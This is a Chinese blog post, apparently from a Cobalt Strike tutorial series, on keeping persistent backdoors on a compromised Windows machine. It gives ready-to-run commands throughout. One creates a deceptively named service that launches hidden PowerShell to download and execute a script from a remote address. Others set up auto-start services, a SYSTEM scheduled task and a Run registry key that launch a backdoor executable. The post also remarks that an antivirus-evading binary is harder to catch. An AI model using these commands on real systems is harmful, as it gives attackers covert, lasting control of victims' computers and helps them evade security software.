Cobalt-Strike-十-可持续后门的使用

xiaoeryu Lv5
  2021-06-07 11:36:24 2021-06-07 11:36:24 创建   2021-06-07 15:59:56 2021-06-07 15:59:56 更新      

服务自启动

  1. 先创建一个与目标机的连接并提升权限

  2. 再使用以下命令来创建自启动服务有两种方式

    2.1. 一种是从远程通过web下载shell来执行自启动服务

    shell sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.3.58:81/a'))\""
shell sc config "Windows Power" start= auto
shell sc description "Windows Power" "windows auto service"
shell net start "Windows Power"	// 启动服务
shell sc delete "Windows Power"	// 删除服务

    2.2. 通过执行本地的后门程序来启动

    shell sc create "server power" binpath= "C:\Users\Administrator\Desktop\artifact.exe"
shell sc description "server power" "description" 设置服务的描述字符串
shell sc config "server power" start= auto 设置这个服务为自动启动
shell net start "server power" 启动服务
    • 第二种方法跟第一种差不多是同样的命令,但是第二种是通过本地程序启动的,如果本地程序做了免杀处理的话会更容易躲过杀毒软件的拦截

计划任务

创建任务

schtasks /create /tn "windowsup" /tr "C:\Users\win7-x86-analyse\Desktop\shell\artifact.exe" /ru SYSTEM /sc onstart

查询任务

schtasks /query /tn windowsup

  • 查询任务如果提示失败(无法加载资源列表)

    chcp 437 // 使用命令修改字符集

手工运行任务

schtasks /run /tn windowsup

注册表启动

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Users\win7-x86-analyse\Desktop\shell\artifact.exe" /f

  • 标题: Cobalt-Strike-十-可持续后门的使用
  • 作者: xiaoeryu
  • 创建于 : 2021-06-07 11:36:24
  • 更新于 : 2021-06-07 15:59:56
  • 链接: https://github.com/xiaoeryu/2021/06/07/Cobalt-Strike-十-可持续后门的使用/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
此页目录
Cobalt-Strike-十-可持续后门的使用
  1. 服务自启动
    1. 计划任务
  2. 注册表启动